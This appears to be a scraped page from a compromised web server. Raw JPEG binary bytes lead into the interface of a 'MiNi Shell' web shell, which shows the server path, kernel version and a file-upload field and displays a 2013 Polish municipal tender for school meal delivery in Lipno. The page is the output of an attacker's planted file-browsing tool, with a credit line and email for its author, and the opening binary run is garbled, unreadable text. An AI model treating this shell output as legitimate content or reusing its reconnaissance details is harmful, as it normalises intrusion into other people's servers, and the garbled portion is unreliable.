JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131205/502584-N-2013.html

<p class="kh_header"><b>Lipno: Dożywianie uczniów z terenu Gminy Lipno w 2014 r</b><br>
<b>Numer ogłoszenia: 502584 - 2013; data zamieszczenia: 05.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Powstańców Wielkopolskich 7, 64-111 Lipno, woj. wielkopolskie, tel. 65 5340 630, faks 65 5340 926.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie uczniów z terenu Gminy Lipno w 2014 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje przygotowanie i dostawę posiłków dla uczniów szkół z terenu Gminy Lipno zgodnie z wymaganiami ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136, poz. 914 ze zm.) oraz ustawy z dnia 14 marca 1985 r. o Państwowej Inspekcji Sanitarnej (Dz. U. z 2006 r., Nr 122, poz. 851 ze zm.), rozporządzenia Ministra Zdrowia z dnia 17 kwietnia 2007 r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. Nr 80, poz. 545 ze zm.) oraz niniejszej specyfikacji. Zakres zamówienia : 1. Przygotowanie posiłków w dniach od poniedziałku do piątku: 
Obiad drugodaniowy 3 razy w tygodniu (dania mięsne):
- Filet z kurczaka panierowany+ziemniaki purre z zieleniną+surówka z kapusty pekińskiej,
- Kotlet schabowy+ziemniaki purre z zieleniną+surówka z kapusty białej,
- Gulasz wieprzowy+kasza jęczmienna+buraczki z jabłkiem na zimno,
- Pieczeń z karkówki+sos pieczeniowy+pyzy+kapusta czerwona gotowana,
- Kotlet mielony wieprzowo-wołowy+ziemniaki purre z zieleniną+sałatka z ogórka kiszonego+jabłka z cebulką,
- Kotlet z piersi z kurczaka zawijany panierowany (z serem lub pieczarkami)+frytki+surówka z kapusty  białej marchwi i jabłka,
- Udko z kurczaka pieczone+ ziemniaki z zieleniną+surówka z selera, marchwi  ze śmietaną,
- Roladka z indyka ze szpinakiem duszona w sosie własnym+kasza jęczmienna+buraki z jabłkiem,
- Udko z kurczaka gotowane+sos potrawkowy+ryż biały lub brązowy+marchew z groszkiem,
- Pulpet drobiowy w sosie pomidorowym+ziemniaki z zieleniną+bukiet warzyw gotowanych (brokuły, kalafior, fasolka szparagowa, marchew),
- Rumsztyk z cebulką (wołowina)+ziemniaki puree  z zieleniną+surówka jarzynowa,
- Gołąbki z mięsa wieprzowo-wołowego+sos pomidorowy+ziemniaki,
- Makaron (spagetii) z sosem bolońskim+surówka z kapusty białej,
- Ryba smażona (filet z miruny lub dorsza) panierowany z cytryną+ziemniaki purre z zieleniną+surówka z kapusty kwaszonej,
- Pieczeń rzymska+ziemniaki purre z zieleniną+buraczki z jabłkiem na zimno,
- Wątróbka drobiowa z cebulką+ziemniaki purre z zieleniną+surówka z pora, ogórka i jabłka,
- Krokiety z mięsem 2szt+surówka z kapusty białej.

Obiad drugodaniowy 2 razy w tygodniu (bezmięsny lub półmięsny):
	- Pierogi leniwe z masłem+surówka z marchwi i jabłka,
	- Naleśniki z serem twarogowym i zmiksowanymi truskawkami,
	- Naleśniki z kurczakiem i warzywami chińskimi+sos pomidorowy,
	- Naleśniki ze szpinakiem i serem feta+sos czosnkowy,
	- Pierogi ruskie z masłem+surówka z kapusty białej, marchwi i jabłka,
	- Ryż na mleku z jabłkami,
	- Potrawa chińska (wieprzowina, warzywa chińskie) z ryżem,
	- Racuchy z prażonymi jabłkami,
	- Placki ziemniaczane z sosem węgierskim (wędlina, papryka, ogórki, cebulka, pomidor),
	- Kopytka z wędliną i cebulką+surówka z kapusty kwaszonej,
	- Makaron z twarogiem na słodko i miksowanymi truskawkami,
	- Makaron Penne ze szpinakiem i szynką,
	- Kluski kładzione z wędliną+surówka z kapusty kwaszonej,
	- Fasolka po bretońsku z wędliną+ziemniaki,
	- Bigos z mięsem i wędliną+ziemniaki,
	- Parówki w cieście ziemniaczanym, smażonym - 2szt, w sosie pomidorowym+surówka z kapusty białej
	- Risotto z mięsa drobiowego z warzywami,
	- Zapiekanka ziemniaczana z boczkiem wędzonym, ogórkiem kiszonym, cebulą i serem żółtym,
	- Lasagna z mięsem wieprzowym i szpinakiem,
	- Kotlet z jaja+ziemniaki purre z zieleniną+surówka z kapusty kwaszonej,
	- Kotlety z kaszy jęczmiennej, fasoli jaś, 2szt z sosem pieczarkowym.

Żadne z dań nie może się powtórzyć w przeciągu miesiąca. Każda zmiana w jadłospisie wymaga akceptacji zamawiającego. 2. Gramatura posiłku - ziemniaki, kasza, ryż, makaron lub frytki 200 g. mięso, ryba lub kiełbasa 80 g + surówka, jarzyny gotowane 100g - naleśniki, placki ziemniaczane, pierogi, racuchy od 250 g do 300 g, 2. Dostawa posiłków od poniedziałku do piątku między godziną 11:00 a 13:00 do niżej wymienionych szkół: Nazwa i adres szkoły Dożywianie - przewidywana dzienna ilość posiłków SP w Wilkowicach, ul. Szkolna 28 - 15 posiłków, SP w Lipnie, ul. Powstańców Wielkopolskich 68 - 22 posiłków, SP w Goniembicach 30 - 10 posiłków, SP w Górce Duchownej 12 - 9 posiłków, Gimnazjum w Lipnie, ul. Powstańców Wielkopolskich 68 - 21 posiłków. UWAGA; 3. Ilość posiłków określona została szacunkowo na podstawie danych z roku 2012 i 2013 i od 7 stycznia 2013 r. może ulec zmianie. 4. Dowożone posiłki winny być dostarczone w termosach zapewniających zachowanie odpowiedniej temperatury przy ich spożywaniu - gorące drugie danie + 63oC; potrawy serwowane na zimno + 4oC. Dostawca zapewnia ze swojej strony termosy, warunkujące zapewnienie odpowiedniej temperatury posiłków przy przewożeniu i dalszym spożywaniu. III. Odbiór resztek po posiłku codziennie między godziną 13.30 a 14.30 ze szkół..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające mogą być udzielone po spełnieniu warunków określonych w art. 67 ust. 1 pkt 6 ustawy do wysokości 20% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE WYKONAWCY POTWIERDZAJĄCE SPEŁNIENIE TEGO WARUNKU (ZAŁĄCZNIK NR 2 DO SIWZ) OCENA SPEŁNIENIA TEGO WARUNKU DOKONANA BĘDZIE NA ZASADZIE SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE WYKONAWCY POTWIERDZAJĄCE SPEŁNIENIE TEGO WARUNKU (ZAŁĄCZNIK NR 2 DO SIWZ) OCENA SPEŁNIENIA TEGO WARUNKU DOKONANA BĘDZIE NA ZASADZIE SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE WYKONAWCY POTWIERDZAJĄCE SPEŁNIENIE TEGO WARUNKU (ZAŁĄCZNIK NR 2 DO SIWZ) OCENA SPEŁNIENIA TEGO WARUNKU DOKONANA BĘDZIE NA ZASADZIE SPEŁNIA/NIE SPEŁNIA ORAZ OŚWIADCZENIE POTWIERDZAJĄCE, ŻE LOKAL DOPUSZCZONY JEST PRZEZ SANEPID DO PROWADZENIA ZBIOROWEGO ŻYWIENIA I SPEŁNIA WYMOGI SANITARNE.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE WYKONAWCY POTWIERDZAJĄCE SPEŁNIENIE TEGO WARUNKU (ZAŁĄCZNIK NR 2 DO SIWZ. OCENA SPEŁNIENIA TEGO WARUNKU DOKONANA BĘDZIE NA ZASADZIE SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE WYKONAWCY POTWIERDZAJĄCE SPEŁNIENIE TEGO WARUNKU (ZAŁĄCZNIK NR 2 DO SIWZ. OCENA SPEŁNIENIA TEGO WARUNKU DOKONANA BĘDZIE NA ZASADZIE SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. WYPEŁNIONA I PODPISANA PRZEZ WYKONAWCĘ OFERTA PRZETARGOWA (ZAŁĄCZNIK NR 1 DO SWIZ) 2. PEŁNOMOCNICTWO (O ILE OFERTĘ SKŁADA PEŁNOMOCNIK) 3. OŚWIADCZENIE POTWIERDZAJĄCE, ŻE LOKAL DOPUSZCZONY JEST PRZEZ SANEPID DO PROWADZENIA ZBIOROWEGO ŻYWIENIA I SPEŁNIA WYMOGI SANITARNE.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.lipno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Lipnie, ul. Powstańców Wlkp. 7, 64-111 Lipno, pok. nr 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Lipnie, ul. Powstańców Wlkp. 7, 64-111 Lipno, pok. nr 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com